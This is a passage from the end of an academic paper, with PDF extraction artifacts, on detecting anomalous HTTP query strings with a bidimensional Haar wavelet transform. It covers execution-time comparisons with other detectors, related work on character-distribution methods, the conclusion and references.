10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i

Tim

e in

ms

Detection Algorithms

Training time

Detection time

0/106/8

0/8

0/0

0/0 0/10 0/10

TW2D-BATW2D-HTNGRAMDBINMD3BIN6BIN

0

250

500

750

1000

1250

1500

1750

2000

2250

10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i 10i 100i 1000i

Tim

e in

ms

Detection Algorithms

Training time

Detection time

143/1012/8

0/8

0/0 2/10

0/10 0/10

TW2D-BATW2D-HTNGRAMDBINMD3BIN6BIN

(a) (b)

Fig. 14 Execution time comparisons between algorithms. Executionaverage time in milliseconds for 10, 100 and 1,000 iterations of thealgorithms, labeled 10i, 100i and 100i, respectively, below each block.

Number of false positives over true positives for a data bank with 10attacks are above the blocks. a Using 100 % of the training data, b using20 % of the training data

algorithm presents 0 % of false positives, but it does not detectall attacks.

In order to have a more complete comparison among thealgorithms, the execution time and the performance withrespect to the detection rate of the five algorithms and thetwo proposed here are presented in Fig. 14 under two differ-ent conditions. In Fig. 14a, the training phase is computedwith 100 % of the training data set, and in Fig. 14b, only 20 %of the training data set is considered. Again the training dataset is the same as the one used in case A presented in Table 3and Sect. 6.1.

The analyzed data set presented a total of 10 attacks (caseG, Table 3). The obtained time estimates are determined forthe mean time of 10, 100 and 1,000 executions of the algo-rithms. In the cases where preprocessing was necessary, themean corresponds for the mean in each stage of the detec-tion. On top of the block representing the execution meantimes, in both figures are presented the number of false pos-itives and the number of detected attacks for each algo-rithm, recalling the total amount of attacks in the data setis 10.

Analyzing the significant variability of the results pre-sented in Fig. 14a, b, one remark is that all five trainingphase-dependent algorithms are very sensitive to the amountof data considered for this preprocessing stage, while the twoproposed detection algorithms are much more robust, beingindependent of the choice of the training set. This indepen-dence is reflected in the computation time as well as in the cor-rect rate of attack detections. On the contrary, the other fivemethods presented considerable variations in execution timeand detection performance according to the training phase,generating many false positives in the case of Fig. 14b oreven not detecting the existing attacks.

8 Related work

This paper has explored the character frequency distribu-tion to intrusion detection in the context of security on theHTTP traffic, deepening the preliminary study presentedin [28]. The approach is based on the observation that forlegitimate inputs the relative character frequencies presentsmooth variations in value. However, malicious input (e.g.,buffer overflows) can exhibit large occurrences of a single-character and/or of random-character values [33]. In thissense, some works in the literature also focus on anomaly-based approaches to analyze character distribution models[19,21,38].

Some anomaly-based approaches that analyze characterdistribution models have explored techniques of machinelearning [19,21,38]. These techniques need a step to obtainthe normal profile with training data and so far this remainsstill a challenge [18]. Putting these points into perspective, theapproach proposed here based on the bidimensional wavelettransform and two refinement steps during the decision phaseof the sensor design is simple and computationally cheap,specially because no training phase is necessary. Anotherpositive aspect of the approach presented here is the absenceof requirements for computing attack-free training data torepresent all real activities. Therefore, the main goal of thepresented methodology is to explore the analysis of char-acter distribution in the detection phase, as usually used bytechniques of machine learning.

For techniques of machine learning, the analysis of char-acter distribution on the detection phase is based on com-parisons between two distributions of requests: normal pro-file obtained in training phase and current requests. For this,statistical tests (as Pearson Chi-square) have been used to

123


obtain differences of distributions [19,21,38]. The PearsonChi-square test requires the use of groups, and different cri-teria of groupings have been used by works in the literature.

The grouping criteria used in the work of Kruegel et al.[21] were defined with the intensity of relative frequency foreach group. This way, six groups (bins) of characters weredetermined as follows: {(0), (1–3), (4–6), (7–11), (12–15),(16–255)}. They point out that although the choice of groupshas been arbitrary, it reflects the fact that the relative frequen-cies are sorted in descending order [22]. The work of Kiani etal. [19] used the grouping criteria so that each group has a fre-quency greater than or equal to five. This process is knownas Yate’s correction [45]. Another approach to the group-ing criteria was considering division of characters in threegroups as the following types: alphabetical characters, num-bers and special symbols. Differently from the cited works,this paper does not use any data grouping heuristic. Avoid-ing the application of an extra grouping algorithm at eachiteration decreases the computational cost of the proposedapproach.

An anomaly is reported if the values obtained by anyapproach were above some detection threshold. Therefore,the definition of a threshold value is relevant for any anom-aly detection sensor, specially because it is responsible forthe classification of a normal or anomalous behavior. Thedefinition of the threshold value according to each method-ology and context can diminish the false-positive rates, and itimplies in the reliability of system. The meaning of the cho-sen threshold value depends on the methodology consideredin each work. In [19,21,38], the threshold used is 10 % higherthan the value maximum of the data involved in the analy-sis. Nevertheless, in [21] the threshold value was uniquelydefined for all process, which can characterize a problembecause the traffic data usually present variations influenc-ing in the behavior analysis. In this paper, no grouping ofdata is considered as in the previously mentioned works, andthe definition of threshold value is specifically for the analy-sis of the wavelet coefficients involved in the design of thedetection sensor.

The main contribution of this work is the systematic evo-lution presented for the construction of the attack detectionsensor based on the two layers of decision, both involvingdifferent threshold values, which explored the properties ofthe bidimensional Haar wavelet transform.

9 Conclusion

In this work, a 2D Haar wavelet transform was used as themain ingredient in the construction of an attack detector forHTTP traffic data. The operations responsible for the dataselection and classification were the hard thresholding andthe best approximation method, both applied directly to the

wavelet coefficients generated by the wavelet decomposi-tion. Besides the initial selection step based on the truncatedwavelet series, a refinement heuristic was proposed, based onthe property of the Haar wavelet transform of approachingdiscrete derivatives of the analyzed data.

In order to clarify many aspects involved in the sensordesign, a detailed case study about the application of one- andbidimensional Haar wavelet transforms associated with bothtruncation operations was provided. The intrinsic bidimen-sional aspects of the data were also explored by the selecteddata structure, and different 3D representations were pre-sented. The reference data set considered for all tests valida-tion was the FPUNA data base, where synthetic attacks wereintroduced in many different windows generated for analysis.The results with respect to the number of correct and wrongdetections (true and false positives) were presented for themany cases analyzed, demonstrating the high efficiency ofthe methodology proposed in this work.

Acknowledgments The first author is supported by CNPq Postdoc-toral Fellowship under number 201457/2010-5.

References

1. Avizienis, A., Laprie, J.C., Randell, B., Landwehr, C.: Basic con-cepts and taxonomy of dependable and secure computing. IEEETrans. Dependable Secure Comput. 1(1), 11–33 (2004)

2. Cavnar, W., Trenkle, J.: n-gram-based text categorization. In:SDAIR, pp. 161–175 (1994)

3. Chandola, V., Banerjee, A., Kumar, V.: Anomaly detection: a sur-vey. ACM Comput. Surv. 41(3), 1–58 (2009)

4. CVE-2001-0500, C.: (2011). http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0500. Accessed Dec 2011

5. Damashek, M.: Gauging similarity with n-grams: language-independent categorization of text. Science 5199, 843–848 (1995)

6. Daubechies, I.: Ten Lectures on Wavelets. Society for Industrialand Applied Mathematics, Philadelphia, PA (1992)

7. Donoho, D., Johnstone, I.: Ideal spatial adaptation via waveletshrinkage. Biometrika 81, 425–455 (1994). doi:10.1093/biomet/81.3.425

8. Donoho, D., Johnstone, I.: Adapting to unknown smoothness viawavelet shrinkage. J. Am. Stat. Assoc. 90, 1200–1224 (1995)

9. Ficco, M., Coppolino, L., Romano, L.: A weight-based symptomcorrelation approach to sql injection attacks. In: Fourth Latin-American Symposium on Dependable Computing, 2009. LADC’09, pp. 9–16 (2009). doi:10.1109/LADC.2009.14

10. Fonseca, J., Vieira, M., Madeira, H.: The web attackerperspective—a field study. In: 2010 IEEE 21st International Sym-posium on Software Reliability Engineering (ISSRE), pp. 299–308(2010). doi:10.1109/ISSRE.2010.21

11. Forrest, S., Hofmeyr, S., Somayaji, A., Longstaff, T.: A sense of selffor unix processes. In: IEEE Symposium on Security and Privacy,pp. 120–128 (1996)

12. Ghosh, A., Schwartzbard, A., Schatz, M.: Learning program behav-ior profiles for intrusion detection. In: USENIX Workshop on Intru-sion Detection and Network Monitoring, pp. 51–62 (1999)

13. Grané, A., Veiga, H.: Wavelet-based detection of outliers in finan-cial time series. Comput. Stat. Data Anal. 54(11), 2580–2593(2010). doi:10.1016/j.csda.2009.12.010

123

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0500

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0500

http://dx.doi.org/10.1093/biomet/81.3.425

http://dx.doi.org/10.1093/biomet/81.3.425

http://dx.doi.org/10.1109/LADC.2009.14

http://dx.doi.org/10.1109/ISSRE.2010.21

http://dx.doi.org/10.1016/j.csda.2009.12.010


14. Huang, C.T., Thareja, S., Shin, Y.J.: Wavelet-based real time detec-tion of network traffic anomalies. I. J. Netw. Secur. 6(3), 309–320(2008)

15. Ingham, K.L.: Anomaly detection for http intrusion detection: algo-rithm comparisons and the effect of generalization on accuracy.Ph.D. thesis, University of New Mexico (2007)

16. Ingham, K.L., Inoue, H.: Comparing anomaly detection techniquesfor http. In: Proceedings of the 10th International Conference onRecent Advances in Intrusion Detection. RAID’07, pp. 42–62.Springer, Berlin (2007)

17. Ingham, K.L., Somayaji, A., Burge, J., Forrest, S.: Learning dfarepresentations of http for protecting web applications. Comput.Netw. 51, 1239–1255 (2007)

18. Jamdagni, A., Tan, Z., Nanda, P., He, X., Liu, R.P.: Intrusion detec-tion using gsad model for http traffic on web services. In: Proceed-ings of the 6th International Wireless Communications and MobileComputing Conference, IWCMC ’10, pp. 1193–1197. ACM, NewYork, NY (2010). doi:10.1145/1815396.1815669

19. Kiani, M., Clark, A., Mohay, G.: Evaluation of anomaly based char-acter distribution models in the detection of sql injection attacks.In: Third International Conference on Availability, Reliability andSecurity, 2008. ARES 08, pp. 47–55 (2008). doi:10.1109/ARES.2008.123

20. Kruegel, C., Valeur, F., Vigna, G.: Intrusion Detection and Corre-lation: Challenges and Solutions. Springer-Verlag TELOS, SantaClara, CA (2004)

21. Kruegel, C., Vigna, G.: Anomaly detection of web-based attacks.In: Proceedings of the 10th ACM Conference on Computer andCommunications Security, CCS ’03, pp. 251–261. ACM, NewYork, NY (2003). doi:10.1145/948109.948144

22. Kruegel, C., Vigna, G., Robertson, W.: A multi-model approach tothe detection of web-based attacks. Comput. Netw. 48, 717–738(2005). doi:10.1016/j.comnet.2005.01.009

23. Krueger, T., Gehl, C., Rieck, K., Laskov, P.: Tokdoc: a self-healingweb application firewall. In: Proceedings of the 2010 ACM Sym-posium on Applied Computing, SAC ’10, pp. 1846–1853. ACM,New York, NY (2010). doi:10.1145/1774088.1774480

24. Krügel, C., Toth, T., Kirda, E.: Service specific anomaly detectionfor network intrusion detection. In: Proceedings of the 2002 ACMSymposium on Applied Computing, SAC ’02, pp. 201–208. ACM,New York, NY (2002). doi:10.1145/508791.508835

25. Lu, W., Ghorbani, A.A.: Network anomaly detection based onwavelet analysis. EURASIP J. Adv. Signal Process 4, 1–16 (2009).doi:10.1155/2009/837601

26. Mahalanobis, P.: On the generalized distance in statistics. Proc.Natl. Inst. Sci. Calcutta 12, 49–55 (1936)

27. Mallat, S.: A Wavelet Tour of Signal Processing, 3rd edn. Else-vier/Academic Press, Amsterdam (2009). The sparse way, Withcontributions from Gabriel Peyré

28. Mozzaquatro, B., Azevedo, R.P., Nunes, R., Kozakevicius, A.,Cappo, C., Schaerer, C.: Anomaly-based techniques for web attacksdetection. J. Appl. Comput. Res. 2(2), 112–120 (2011)

29. OWASP, T.O.W.A.S.P.: Top 10 web application security risks(2010). http://www.owasp.org/index.php/Top10

30. Patcha, A., Park, J.M.: An overview of anomaly detection tech-niques: existing solutions and latest technological trends. Comput.Netw. 51(12), 3448–3470 (2007). doi:10.1016/j.comnet.2007.02.001

31. Pearson, K.: On a criterion that a given system of deviations fromthe probable in the case of correlated system of variables is duchthat it can be reasonably supposed to have arisen from randomsampling. Philos. Mag. 50, 157–175 (1900)

32. Rieck, K., Laskov, P.: Detecting Unknown Network Attacks UsingLanguage Models, Lecture Notes in Computer Science, vol. 4064,pp. 74–90. Springer, Berlin (2006). doi:10.1007/11790754_5

33. Robertson, W., Vigna, G., Kruegel, C., Kemmerer, R.: Using gen-eralization and characterization techniques in the anomaly-baseddetection of web attacks. In: Proceeding of the Network and Dis-tributed System Security Symposium (NDSS). San Diego, CA(2006)

34. Robertson, W.K.: Detecting and preventing attacks against webapplications. Ph.D. thesis, University of California, Santa Barbara(2009)

35. Scambray, J., Liu, V., Sima, C.: Hacking Exposed Web Applica-tions. Mc Graw Hill, New York (2011)

36. Singh, G., Masseglia, F., Fiot, C., Marascu, A., Poncelet, P.: Datamining for intrusion detection: from outliers to true intrusions. In:Theeramunkong, T., Kijsirikul, B., Cercone, N., Ho, T.B. (eds.)Advances in Knowledge Discovery and Data Mining. LectureNotes in Computer Science, vol. 5476, pp. 891–898. Springer,Berlin (2009)

37. Song, Y., Keromytis, A., Stolfo, S.: Spectrogram: a mixture-of-markov-chains model for anomaly detection in web traffic. In:Proceedings of the 16th Annual Network and Distributed SystemSecurity Symposium (NDSS) San Diego, pp. 121–135. InternetSociety (2009)

38. Sriraghavan, R., Lucchese, L.: Data processing and anomaly detec-tion in web-based applications. In: IEEE Workshop on MachineLearning for Signal Processing, 2008. MLSP 2008, pp. 187–192(2008). doi:10.1109/MLSP.2008.4685477

39. Stollnitz, E., DeRose, A., Salesin, D.: Wavelets for computer graph-ics: a primer 1. IEEE Comput. Graph. Appl. 15(3), 76–84 (1995).doi:10.1109/38.376616

40. Su, Z., Wassermann, G.: The essence of command injection attacksin web applications. SIGPLAN Not. 41, 372–382 (2006). doi:10.1145/1111320.1111070

41. Vulnerabilities, C.C., Exposures: common vulnerabilities andexposures (2011). http://www.cve.mitre.org. Accessed Dec 2011

42. Wagner, R., Fontoura, L.M., Nunes, R.C.: Tailoring rational uni-fied process to contemplate the SSE-CMM. In: Latin AmericanConference on Informatics, CLEI 2011. Quito, Equador (2011)

43. Wang, K., Parekh, J., Stolfo, S.: Anagram: A content anomalydetector resistant to mimicry attack. In: Recent Adances in Intru-sion Detection (RAID), pp. 226–248 (2006)

44. Wang, K., Stolfo, S.: Anomalous payload-based network intrusiondetection. In: Jonsson, E., Valdes, A., Almgren, M. (eds.) RecentAdvances in Intrusion Detection, Lecture Notes in Computer Sci-ence, vol. 3224, pp. 203–222. Springer, Berlin (2004)

45. Yates, F.: Contingency table involving small numbers and the χ2

test. Suppl J R Stat Soc 1(2), 217–235 (1934)46. Zhou, Z., Zhongwen, C., Tiecheng, Z., Xiaohui, G.: The study on

network intrusion detection system of snort. In: 2010 2nd Inter-national Conference on Networking and Digital Society (ICNDS),vol. 2, pp. 194–196 (2010). doi:10.1109/ICNDS.2010.5479341

123

http://dx.doi.org/10.1145/1815396.1815669

http://dx.doi.org/10.1109/ARES.2008.123

http://dx.doi.org/10.1109/ARES.2008.123

http://dx.doi.org/10.1145/948109.948144

http://dx.doi.org/10.1016/j.comnet.2005.01.009

http://dx.doi.org/10.1145/1774088.1774480

http://dx.doi.org/10.1145/508791.508835

http://dx.doi.org/10.1155/2009/837601

http://www.owasp.org/index.php/Top10



http://dx.doi.org/10.1007/11790754_5

http://dx.doi.org/10.1109/MLSP.2008.4685477

http://dx.doi.org/10.1109/38.376616

http://dx.doi.org/10.1145/1111320.1111070

http://dx.doi.org/10.1145/1111320.1111070

http://www.cve.mitre.org

http://dx.doi.org/10.1109/ICNDS.2010.5479341

Documents

URL query string anomaly sensor designed with the bidimensional Haar wavelet transform